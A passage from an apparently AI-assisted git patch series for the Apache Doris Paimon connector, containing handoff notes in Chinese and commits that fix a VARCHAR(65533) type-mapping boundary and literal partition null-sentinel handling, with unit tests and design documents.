checkstyle:check`;fe-core `mvn -pl :fe-core checkstyle:check`(exit 0 即净)。 +- 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。**本 P3-fix 改的是 fe-core 桥,不涉 import-gate。** - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE 单测(harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`)。**关键**:`FakePaimonTable.newReadBuilder()` 抛 → 纯静态 seam(`shouldUseNativeReader`/`isForceJniScannerEnabled`/`isCountPushdownSplit`/`computeFileSplitOffsets`/`determineTargetSplitSize`/`buildNativeRanges`)才离线可测;但**真 `DataSplit` 可经 `buildRealDataSplit`/inline FileSystemCatalog 离线构造**(#8/#9 end-to-end 测即用之:PK 表 count、append-only 表 sub-split)。live-e2e CI-gated → 注明 gated,勿谎称跑过。 +- 测试优先 runnable FE 单测。fe-core 桥测 harness:`PluginDrivenExternalCatalogDdlRoutingTest`(Mockito 构造 `ExternalDatabase`/`metadata`/`session`、`MockedStatic`、`mockEditLog`);连接器测 harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`。live-e2e CI-gated → 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- **#8/#9 验证的高价值模式(再次奏效)**:finding → **多-scout recon workflow + 对抗 synthesizer**(决定 pure-connector vs needs-SPI、DV 安全性等 gating 问题)→ 设计 doc → 实现 → **fail-before 实测**(neuter helper、双向红)→ pass-after → **独立 commit 前再跑对抗 review workflow**。**两次 review 都揪出真 finding**:#8 review 抓出我自己的测 degenerate(单-split fixture 让 collapse/sum 断言失效);#9 review 抓出 count-pushdown sub-split parity gap(我设计 doc 的假"无 interaction"声明)+ 缺 DV-on-every-sub-range 测。**教训:commit 前的对抗 review 对 test-rigor + 自身设计假设的证伪价值极高,勿跳过。** -- **#8 关键定夺**:连接器无法见 agg-op(per-query planner 输出非 session var)→ 必须过 SPI(否决 session-channel hack);collapse-to-one = legacy `<=10000` 普遍化。 -- **#9 关键定夺**:DV×sub-split 安全(全局行位);count-pushdown 下 native split 保整文件(legacy `splittable=!applyCountPushdown`);纯静态 math seam 可离线 mutation-test,真 DataSplit 经 inline FileSystemCatalog 可离线 end-to-end。 -- **P3 是核查不是改**:先拿当前代码复核(行号已大漂移,#3/#4/#6/#7/#8/#9 都改过 scan provider / metadata),查出真分歧再 AskUserQuestion 定 scope。 -- **跨连接器 follow-up 累积**:[DV-028]/[DV-030]/[DV-031](read 法/翻闸 vs fe-core 约定)+ [DV-032](count collapse parallel-trim)+ [DV-033](native split-weight nicety)—— hudi/iceberg full-adopter 同复发,将来批量 close。 +- **P3 验证模式(再次奏效)**:finding → **多-item 对抗 audit workflow**(tracer 独立判断 → 对抗 verifier 逐条**证伪 parity 声明**→ completeness critic 抓未追 aspect)→ 真分歧 AskUserQuestion 定 scope → 转 FIX 走 per-fix 流程。**本轮对抗 verifier 把 tracer 的 createTable PARITY 推翻为 DIVERGENCE**(tracer 只看到 IF-NOT-EXISTS 短路对、没看到 !IF-NOT-EXISTS 臂丢 local-arm)——**教训:parity 核查里「短路对」≠「全分支对」,对抗 verifier 价值在逐分支证伪**。 +- **P3-fix 关键定夺**:通用桥 bug(非 paimon-specific),Option-2 外科最小修(仅补 local-conflict 闸、不动 case-A remote-hit 路),保既有 intentional 测绿;否决 Option-1 full-parity(越 finding 界)。 +- **completeness critic 的残留**(均评估为 benign,未翻 verdict,可按需深挖):① HMS-CONFRES 的 DLF BE-downflow 由 HMS 路类推非独立 trace(两侧对称 drop,低危);② DDL editlog/cache replay 收敛只展示了 plugin metadataOps==null 臂、legacy metadataOps!=null 臂未展示(同步 DDL 内 benign);③ split-count 的 `SqlBlockRuleMgr` 实际消费 call-site 未引(共享父代码、构造即同)。 +- **跨连接器 follow-up 累积**:[DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/**[DV-034]** —— hudi/iceberg full-adopter 同复发,将来批量 close。 From 23d09436abe6c5b45910a43375240a468dad9949 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 13:26:17 +0800 Subject: [PATCH 033/128] =?UTF-8?q?fix:=20FIX-VARCHAR-BOUNDARY=20=E2=80=94?= =?UTF-8?q?=20read=20VARCHAR(65533)=20reported=20as=20STRING=20(P4=20N10.1?= =?UTF-8?q?)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: the plugin read-direction type mapping PaimonTypeMapping.toVarcharType used `len >= 65533` to overflow a paimon VarCharType to STRING, while legacy PaimonUtil.paimonPrimitiveTypeToDorisType uses `len > 65533`. 65533 == ScalarType.MAX_VARCHAR_LENGTH is the legal exact-fit max VARCHAR, not the STRING wildcard, so the connector widened VARCHAR(65533) to STRING — a DESCRIBE / SHOW CREATE TABLE reported-type divergence (data and read correctness unaffected; STRING is a superset). Fix: change the boundary `>= 65533` -> `> 65533` to match legacy byte-for-byte (pure connector, 1 char). The unreachable `len <= 0` defensive guard is kept untouched (paimon VarCharType min length is 1). Tests: new read-direction PaimonTypeMappingReadTest pins the boundary intent (65532 -> VARCHAR(65532); 65533 -> VARCHAR(65533) [the fix]; 65534 -> STRING). Fail-before exactly the 65533 assertion red ("expected VARCHAR but was STRING"); pass-after green. Full module 260/0/0 (1 CI-gated live skip), checkstyle 0, connector import-gate clean. No BE/SPI change; reported-type parity otherwise covered by the CI-gated legacy paimon DESCRIBE regression. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/paimon/PaimonTypeMapping.java | 6 +- .../paimon/PaimonTypeMappingReadTest.java | 57 ++++++++++++++++ .../designs/P5-fix-VARCHAR-BOUNDARY-design.md | 65 +++++++++++++++++++ 3 files changed, 127 insertions(+), 1 deletion(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTypeMappingReadTest.java create mode 100644 plan-doc/tasks/designs/P5-fix-VARCHAR-BOUNDARY-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTypeMapping.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTypeMapping.java index 72caf7a76aed83..4d00395f75fd9b 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTypeMapping.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTypeMapping.java @@ -112,7 +112,11 @@ public static ConnectorType toConnectorType(DataType dataType, Options options) private static ConnectorType toVarcharType(VarCharType type) { int len = type.getLength(); - if (len <= 0 || len >= 65533) { + // 65533 == ScalarType.MAX_VARCHAR_LENGTH is the legal exact-fit max VARCHAR, not the STRING + // wildcard; only a length strictly greater than it overflows to STRING. Use `> 65533` to + // match legacy PaimonUtil.paimonPrimitiveTypeToDorisType byte-for-byte (the `len <= 0` guard + // is unreachable for real paimon — VarCharType min length is 1 — kept defensively). + if (len <= 0 || len > 65533) { return ConnectorType.of("STRING"); } return ConnectorType.of("VARCHAR", len, 0); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTypeMappingReadTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTypeMappingReadTest.java new file mode 100644 index 00000000000000..eebaef8635f07f --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTypeMappingReadTest.java @@ -0,0 +1,57 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorType; + +import org.apache.paimon.types.VarCharType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * P5-fix FIX-VARCHAR-BOUNDARY (review §5 N10.1) — pins the read-direction VARCHAR length boundary + * in {@link PaimonTypeMapping#toConnectorType} to byte-parity with legacy + * {@code PaimonUtil.paimonPrimitiveTypeToDorisType}. + */ +public class PaimonTypeMappingReadTest { + + private static ConnectorType mapVarchar(int len) { + return PaimonTypeMapping.toConnectorType(new VarCharType(len), PaimonTypeMapping.Options.DEFAULT); + } + + @Test + public void varcharMaxLengthBoundaryMatchesLegacy() { + // WHY: 65533 (== ScalarType.MAX_VARCHAR_LENGTH) is the legal exact-fit max VARCHAR, NOT the + // STRING wildcard. Legacy uses `> 65533`, so 65533 must stay VARCHAR(65533); only a length + // strictly greater overflows to STRING. The plugin path must agree byte-for-byte so that + // DESCRIBE / SHOW CREATE TABLE report the same column type as legacy paimon. + // MUTATION: reverting the boundary to `>= 65533` widens the 65533 case to STRING -> red. + + ConnectorType below = mapVarchar(65532); + Assertions.assertEquals("VARCHAR", below.getTypeName()); + Assertions.assertEquals(65532, below.getPrecision()); + + ConnectorType exact = mapVarchar(65533); + Assertions.assertEquals("VARCHAR", exact.getTypeName(), + "VARCHAR(65533) is the exact-fit max VARCHAR and must not widen to STRING"); + Assertions.assertEquals(65533, exact.getPrecision()); + + ConnectorType above = mapVarchar(65534); + Assertions.assertEquals("STRING", above.getTypeName(), "length > 65533 overflows to STRING"); + } +} diff --git a/plan-doc/tasks/designs/P5-fix-VARCHAR-BOUNDARY-design.md b/plan-doc/tasks/designs/P5-fix-VARCHAR-BOUNDARY-design.md new file mode 100644 index 00000000000000..605c40c1099ffd --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-VARCHAR-BOUNDARY-design.md @@ -0,0 +1,65 @@ +# P5-fix FIX-VARCHAR-BOUNDARY (P4 / review §5 N10.1) + +> Pure-connector, display-only exact-parity restore. One of 3 actionable P4 MINOR/NIT items (user-signed scope, 2026-06-12). + +## Problem +Read-direction type mapping widens a paimon `VARCHAR(65533)` column to `STRING` on the plugin +path, whereas legacy reports `VARCHAR(65533)`. Observable in `DESCRIBE` / `SHOW CREATE TABLE` / +`information_schema.columns` only — data and read correctness are identical (STRING is a strict +superset of the bounded VARCHAR; no truncation either way). + +## Root Cause +`PaimonTypeMapping.toVarcharType` (`fe-connector-paimon/.../PaimonTypeMapping.java:113-119`): + +```java +if (len <= 0 || len >= 65533) { // <-- `>= 65533` over-widens the exact-fit max VARCHAR + return ConnectorType.of("STRING"); +} +return ConnectorType.of("VARCHAR", len, 0); +``` + +Legacy `PaimonUtil.paimonPrimitiveTypeToDorisType` (`fe-core/.../paimon/PaimonUtil.java:239-244`): + +```java +if (varcharLen > 65533) { // <-- `> 65533`: 65533 falls through to VARCHAR(65533) + return ScalarType.createStringType(); +} +return ScalarType.createVarcharType(varcharLen); +``` + +`65533 == ScalarType.MAX_VARCHAR_LENGTH` is a legal exact-fit VARCHAR, not the STRING wildcard. +The connector's `>=` is an off-by-one at exactly that boundary value. + +## Design +Change the boundary comparison `>= 65533` → `> 65533` to match legacy byte-for-byte. + +Keep the `len <= 0` defensive guard untouched (Rule 3 — surgical). It has no legacy equivalent +but is unreachable from real paimon (paimon `VarCharType` minimum length is 1), so it causes no +observable divergence and removing it would be a behaviorally-inert cosmetic edit. + +CHAR is already at parity (`len > 255` on both sides) — out of scope. + +## Implementation Plan +1 file, 1 char: `PaimonTypeMapping.java:115` `len >= 65533` → `len > 65533`. + +## Risk Analysis +None. Pure FE-side reported-type metadata; no thrift/BE/SPI surface; no behavioral change other +than the intended boundary. The only newly-affected input is exactly `len == 65533`. + +## Test Plan +### Unit Tests +New focused `PaimonTypeMappingReadTest` (read-direction sibling of `PaimonTypeMappingToPaimonTest`) +pinning the boundary intent: +- `VarCharType(65532)` → `VARCHAR(65532)` (below boundary, unchanged). +- `VarCharType(65533)` → `VARCHAR(65533)` (**the fix**; fail-before: connector returns STRING). +- `VarCharType(65534)` → `STRING` (above boundary, unchanged; matches legacy `> 65533`). + +WHY (Rule 9): encodes that 65533 is the exact-fit max VARCHAR (= MAX_VARCHAR_LENGTH), not a +STRING wildcard — distinguishing `>=` (wrong) from `>` (correct). A test that only checked a +mid-range length could not fail when the boundary regresses. + +Fail-before: with `>=`, the 65533 assertion is red. Pass-after: green. + +### E2E Tests +None added. Reported-type parity is covered by the existing legacy paimon DESCRIBE/SHOW regression +(CI-gated); this fix carries no BE change. From f135c75a3d50fe3bff34109bf3225e7bddb9306f Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 13:39:45 +0800 Subject: [PATCH 034/128] =?UTF-8?q?fix:=20FIX-PARTITION-NULL-SENTINEL=20?= =?UTF-8?q?=E2=80=94=20scan-path=20coerces=20literal=20\N=20partition=20va?= =?UTF-8?q?lue=20to=20NULL=20(P4)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: PaimonScanRange.populateRangeParams routed paimon partition values through ConnectorPartitionValues.normalize, which applies Hive-directory null-sentinel coercion (a value of "\N" or "__HIVE_DEFAULT_PARTITION__" -> isNull). That coercion is correct for hudi (path-encoded partitions) but wrong for paimon: paimon partition values are TYPED — serializePartitionValue returns Java-null for a genuine null and the literal toString() otherwise — so a null is never a directory sentinel, and the coercion only ever bites a genuine literal value. A string partition column literally holding "\N" (which paimon does NOT reserve) or "__HIVE_DEFAULT_PARTITION__" was materialized as SQL NULL instead of the literal on the native ORC/Parquet read, diverging from legacy PaimonScanNode.setScanParams (source/PaimonScanNode.java:323-326) and yielding wrong rows for WHERE col='\N' / col IS NULL. The dominant genuine-NULL case is unaffected (both sides set isNull=true and BE ignores the rendered value string when is_null==true, partition_column_filler.h:40-44). Fix (1 file): derive isNull from the Java null ONLY (render genuine null as "", legacy-exact); drop the unused ConnectorPartitionValues import. ConnectorPartitionValues itself is left untouched — hudi (HudiScanRange.java:226) legitimately needs the Hive-directory coercion. The residual scan-vs-prune skew for a literal "__HIVE_DEFAULT_PARTITION__" value lives in the generic fe-core prune bridge (TablePartitionValues), is pre-existing and unchanged by this fix, and is logged as a deviation. Tests: new PaimonScanRangePartitionNullTest pins genuine-null -> (isNull=true, ""); literal "\N" -> (isNull=false, "\N"); literal "__HIVE_DEFAULT_PARTITION__" -> (isNull=false, verbatim); ordinary -> kept. Fail-before (re-inlined coercion) reds the literal + render rows; pass-after green. Full module 261/0/0 (1 CI-gated live skip), checkstyle 0, import-gate clean. Adversarial review (5 angles) SAFE_TO_COMMIT: total convergence of all 3 range builders on populateRangeParams; no query goes correct->wrong. No BE/SPI change; native partition materialization otherwise covered by the CI-gated legacy paimon partition regression. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/paimon/PaimonScanRange.java | 21 ++-- .../PaimonScanRangePartitionNullTest.java | 96 +++++++++++++++++++ .../P5-fix-PARTITION-NULL-SENTINEL-design.md | 90 +++++++++++++++++ 3 files changed, 201 insertions(+), 6 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanRangePartitionNullTest.java create mode 100644 plan-doc/tasks/designs/P5-fix-PARTITION-NULL-SENTINEL-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java index 8c6e2b4ec98fdf..bc7be07498b977 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java @@ -17,7 +17,6 @@ package org.apache.doris.connector.paimon; -import org.apache.doris.connector.api.scan.ConnectorPartitionValues; import org.apache.doris.connector.api.scan.ConnectorScanRange; import org.apache.doris.connector.api.scan.ConnectorScanRangeType; import org.apache.doris.thrift.TFileFormatType; @@ -214,15 +213,25 @@ public void populateRangeParams(TTableFormatFileDesc formatDesc, if (partValues != null && !partValues.isEmpty()) { List pathKeys = new ArrayList<>(); List pathValues = new ArrayList<>(); + List pathIsNull = new ArrayList<>(); for (Map.Entry entry : partValues.entrySet()) { + // Paimon partition values are already TYPED: the per-type serializer + // (PaimonScanPlanProvider.serializePartitionValue) returns Java null for a genuine + // null and the literal toString() otherwise — a null is never a Hive directory + // sentinel. So derive isNull from the Java null ONLY, matching legacy + // PaimonScanNode.setScanParams (source/PaimonScanNode.java:323-326). Do NOT route + // through ConnectorPartitionValues.normalize: its __HIVE_DEFAULT_PARTITION__/"\N" + // coercion is correct for hudi (path-encoded partitions) but here would turn a + // genuine literal partition value of "\N" or "__HIVE_DEFAULT_PARTITION__" into SQL + // NULL. BE ignores the rendered string when isNull=true, so "" matches legacy. + String value = entry.getValue(); pathKeys.add(entry.getKey()); - pathValues.add(entry.getValue()); + pathValues.add(value != null ? value : ""); + pathIsNull.add(value == null); } - ConnectorPartitionValues.Normalized normalized = - ConnectorPartitionValues.normalize(pathValues); rangeDesc.setColumnsFromPathKeys(pathKeys); - rangeDesc.setColumnsFromPath(normalized.getValues()); - rangeDesc.setColumnsFromPathIsNull(normalized.getIsNull()); + rangeDesc.setColumnsFromPath(pathValues); + rangeDesc.setColumnsFromPathIsNull(pathIsNull); } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanRangePartitionNullTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanRangePartitionNullTest.java new file mode 100644 index 00000000000000..f64ad21eb0fa9b --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanRangePartitionNullTest.java @@ -0,0 +1,96 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.thrift.TFileRangeDesc; +import org.apache.doris.thrift.TTableFormatFileDesc; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.LinkedHashMap; +import java.util.List; +import java.util.Map; + +/** + * P5-fix FIX-PARTITION-NULL-SENTINEL (review §5 sentinel data-edge) — pins that + * {@link PaimonScanRange#populateRangeParams} derives a partition column's {@code isNull} from the + * Java null ONLY (legacy {@code PaimonScanNode.setScanParams:323-326} parity), and does NOT apply + * the Hive-directory sentinel coercion of {@code ConnectorPartitionValues.normalize}. + * + *

      Paimon partition values are typed: the per-type serializer returns a Java null for a genuine + * null, never a directory sentinel. So a literal {@code "\N"} or {@code "__HIVE_DEFAULT_PARTITION__"} + * partition value is REAL DATA and must be kept, not coerced to SQL NULL (which is correct for + * hudi's path-encoded partitions, but wrong here). + */ +public class PaimonScanRangePartitionNullTest { + + private static TFileRangeDesc populate(Map partitionValues) { + PaimonScanRange range = new PaimonScanRange.Builder() + .fileFormat("jni") + .paimonSplit("dummy-split") // JNI path; the partition block runs regardless + .partitionValues(partitionValues) + .build(); + TFileRangeDesc rangeDesc = new TFileRangeDesc(); + range.populateRangeParams(new TTableFormatFileDesc(), rangeDesc); + return rangeDesc; + } + + @Test + public void onlyJavaNullIsTreatedAsNullPartition() { + Map pv = new LinkedHashMap<>(); + pv.put("ordinary", "cn"); + pv.put("genuine_null", null); + pv.put("literal_slash_n", "\\N"); // 2 chars: backslash, N + pv.put("literal_hive_default", "__HIVE_DEFAULT_PARTITION__"); + + TFileRangeDesc desc = populate(pv); + List keys = desc.getColumnsFromPathKeys(); + List values = desc.getColumnsFromPath(); + List isNull = desc.getColumnsFromPathIsNull(); + + Assertions.assertEquals( + Arrays.asList("ordinary", "genuine_null", "literal_slash_n", "literal_hive_default"), keys); + + // WHY: paimon partition values are typed — a genuine null is a Java null, never a Hive + // directory sentinel. isNull must derive from the Java null ONLY (legacy + // PaimonScanNode:323-326). A literal "\N" / "__HIVE_DEFAULT_PARTITION__" is real data and + // must be kept verbatim, not coerced to NULL. MUTATION: routing through + // ConnectorPartitionValues.normalize (Hive-aware coercion) flips both literal rows to + // isNull=true (and the genuine null renders "\N" not "") -> red. + + // ordinary value -> kept, not null + Assertions.assertEquals("cn", values.get(0)); + Assertions.assertFalse(isNull.get(0)); + + // genuine Java-null -> null, rendered "" (legacy-exact; BE ignores the string when isNull) + Assertions.assertTrue(isNull.get(1)); + Assertions.assertEquals("", values.get(1)); + + // literal "\N" -> NOT null, literal kept (the fix; paimon does not reserve "\N") + Assertions.assertFalse(isNull.get(2), + "literal \\N is real data, not a null marker, on the paimon scan path"); + Assertions.assertEquals("\\N", values.get(2)); + + // literal "__HIVE_DEFAULT_PARTITION__" -> NOT null on the scan path (legacy keeps the literal) + Assertions.assertFalse(isNull.get(3), + "literal __HIVE_DEFAULT_PARTITION__ kept verbatim on the paimon scan path"); + Assertions.assertEquals("__HIVE_DEFAULT_PARTITION__", values.get(3)); + } +} diff --git a/plan-doc/tasks/designs/P5-fix-PARTITION-NULL-SENTINEL-design.md b/plan-doc/tasks/designs/P5-fix-PARTITION-NULL-SENTINEL-design.md new file mode 100644 index 00000000000000..f88c065c566f6e --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-PARTITION-NULL-SENTINEL-design.md @@ -0,0 +1,90 @@ +# P5-fix FIX-PARTITION-NULL-SENTINEL (P4 / review §5 sentinel data-edge) + +> The one P4 item the handoff reserved for a deliberate decision. User-signed FIX (2026-06-12). +> Pure-connector, scan-path. Adversarial-verified: the *common* genuine-NULL case is NOT a +> regression; the fix targets a narrow but real literal-value wrong-result. + +## Problem +On the plugin scan path, a partition column whose **genuine, non-null** value is literally +`\N` (backslash-N, 2 chars) or `__HIVE_DEFAULT_PARTITION__` is materialized as SQL **NULL** +instead of the literal string. Legacy paimon keeps the literal. Reachable for a string +(VARCHAR/CHAR) partition column on the native ORC/Parquet read; `\N` is *not* a paimon-reserved +token (paimon's null marker is `__DEFAULT_PARTITION__`), so it is an ordinary value a user can +store. Result: wrong cell + a scan-vs-prune inconsistency (`WHERE col='\N'` / `col IS NULL` +return divergent rows). + +The dominant case — a **genuine NULL** partition — is NOT affected: both sides set `isNull=true` +and BE ignores the rendered value string when `is_null==true` +(`be/src/format/table/partition_column_filler.h:40-44` early-returns NULL rows without reading +the value), so connector `\N` vs legacy `""` render is unobservable. (Re-verified by two +adversarial agents + a render-path skeptic in recon `wf_6884d37b-8ef`.) + +## Root Cause +`PaimonScanRange.populateRangeParams` (`PaimonScanRange.java:212-226`) routes paimon partition +values through `ConnectorPartitionValues.normalize`, which applies **Hive-directory** null-sentinel +coercion: + +```java +public static boolean isNullPartitionValue(String value) { + return value == null || HIVE_DEFAULT_PARTITION.equals(value) || NULL_PARTITION_VALUE.equals(value); +} // NULL_PARTITION_VALUE = "\\N" +``` + +That coercion is **correct for hudi** (`HudiScanRange.java:226`), whose partition values come from +Hive-style directory PATHS where a null partition is encoded as the `__HIVE_DEFAULT_PARTITION__` +directory name. It is **wrong for paimon**: paimon partition values are already *typed* — the +per-type serializer `serializePartitionValue` (`PaimonScanPlanProvider.java:843-885`) returns +Java-`null` for a genuine null and the literal `toString()` otherwise (`getPartitionInfoMap:801-829` +`put`s Java-null into the map). So a paimon null is a Java-null, never a sentinel string; the +coercion only ever bites a genuine literal value. + +Legacy `PaimonScanNode.setScanParams` (`source/PaimonScanNode.java:323-326`) derives `isNull` from +the Java null **only**: `fromPathValues.add(value != null ? value : ""); fromPathIsNull.add(value == null);`. + +## Design +Paimon-local fix: in `PaimonScanRange.populateRangeParams`, derive `isNull` from the Java null only +(legacy parity) instead of the Hive-aware `ConnectorPartitionValues.normalize`. Render a genuine +null as `""` (legacy-exact; unobservable since BE ignores it when `isNull`). Drop the now-unused +`ConnectorPartitionValues` import. + +**Do NOT touch `ConnectorPartitionValues`** — it is shared API and hudi legitimately needs the +Hive-directory coercion. + +### Out of scope (deliberately) +The Nereids **prune** path (`TablePartitionValues.toListPartitionItem:162`, fed via the generic +bridge `PluginDrivenExternalTable.getNameToPartitionItems:333`) coerces `__HIVE_DEFAULT_PARTITION__` +while legacy paimon `PaimonUtil.toListPartitionItem:214` hardcodes `isNull=false`. That divergence: +(a) is in generic fe-core shared with hive/iceberg, (b) is pre-existing and unchanged by this fix, +(c) for the genuine-null + `partition.default-name=__HIVE_DEFAULT_PARTITION__` case the connector +is arguably MORE correct than legacy's hardcoded-false. After this scan fix, the only residual +difference is the contrived literal-`__HIVE_DEFAULT_PARTITION__` value (THE Hive null marker, +effectively unreachable). Logged as a deviation; not fixed here (would require a paimon-specific +fe-core prune path — out of finding scope, and would regress hudi if done in the shared class). + +## Implementation Plan +1 file (`PaimonScanRange.java`): replace the `normalize`-based block with the inline +`isNull = value==null` / `render = value!=null?value:""` computation; remove the unused import. + +## Risk Analysis +- Genuine-null: byte-identical BE result (NULL cell) before/after — proven unobservable render diff. +- Non-null literal `\N` / `__HIVE_DEFAULT_PARTITION__`: now kept as literal (was wrongly NULL) → + matches legacy scan exactly. Net strictly toward parity. +- No SPI/BE/thrift change; hudi untouched. + +## Test Plan +### Unit Tests +Extend `PaimonPartitionValueRenderTest` (or add a focused test) exercising +`PaimonScanRange.populateRangeParams` via a built range's `TFileRangeDesc`: +- genuine null (map value Java-null) → `columnsFromPathIsNull[i]=true` (unchanged). +- literal `"\N"` → `isNull=false`, `columnsFromPath[i]="\N"` (**the fix**; fail-before: isNull=true). +- literal `"__HIVE_DEFAULT_PARTITION__"` → `isNull=false`, value kept (**the fix**). +- ordinary value `"cn"` → `isNull=false`, value `"cn"` (unchanged). + +WHY (Rule 9): encodes that paimon partition nulls are Java-null-only (typed source), so a literal +sentinel string is real data, not a null marker — distinguishing the Hive-directory coercion +(wrong here) from the legacy `value==null` rule (correct). Fail-before: the `\N` / +`__HIVE_DEFAULT_PARTITION__` literal assertions are red (currently coerced to isNull=true). + +### E2E Tests +None added; the genuine-null render parity and native partition materialization are covered by the +CI-gated legacy paimon partition regression. No BE change. From 5faffbc10a4c4be378b6084cd536e394b1753832 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 13:58:54 +0800 Subject: [PATCH 035/128] =?UTF-8?q?docs:=20P4=20MINOR/NIT=20cleanup=20comp?= =?UTF-8?q?lete=20=E2=80=94=202=20fix=20+=2015=20accept=20([D-057]/[DV-035?= =?UTF-8?q?])?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Records the P4 cleanup pass disposition (P0–P4 now all clear): - FIX-VARCHAR-BOUNDARY (N10.1) `bcee91dcb52` + FIX-PARTITION-NULL-SENTINEL `4b2c2190dc2` landed as independent fix commits. - 15 items accepted as deviations (M5.1 transient-only + 14 display/perf/text/inert/connector-more-correct/false-premise) → [DV-035]. - D-057 logs the user-signed scope; DV-035 the accepted batch. - task-list §P4 marked done; HANDOFF rolled to next session (B8 legacy deletion or cross-connector follow-up batch). Read-only adversarial recon `wf_6884d37b-8ef` re-verified all ~17 review §5/§7 items against current code; the sentinel ACCEPT verdict was refuted by a prune-path skeptic (converted to FIX) and M5.1's "cheap fallback" premise was refuted at impl level (confirmed ACCEPT). Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 54 ++++++++++-------------- plan-doc/decisions-log.md | 14 ++++++ plan-doc/deviations-log.md | 13 +++++- plan-doc/task-list-P5-rereview2-fixes.md | 14 ++++-- 4 files changed, 60 insertions(+), 35 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index f447a775128afe..6321d16d2d6c13 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,28 +5,21 @@ --- -# 🎯 下一个 session 的任务 — **P3 覆盖缺口核查全完成(3 parity + 1 fix landed);进入 P4 cleanup 或 B8 legacy 删除** +# 🎯 下一个 session 的任务 — **P4 cleanup 全完成(2 fix + 15 accept);进入 B8 legacy 删除 或 跨连接器 follow-up 批量** 第二轮 clean-room 对抗 review report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md)。 -👉 **任务清单:[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— #1~#9 全完成 + **P3 全核查完成 + P3-fix landed**。 +👉 **任务清单:[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— #1~#9 + P3 + **P4 cleanup 全完成**。**无 P0/P1/P2/P3/P4 阻塞剩余。** -## ✅ 本 session 完成(P3 覆盖缺口核查 + 1 个 fix) -P3「**去查不是去改**」:4 项 plugin-vs-legacy paimon parity,对抗 audit workflow `wf_25450c36-b7a`(tracer → 对抗 verifier → completeness critic)。**3/4 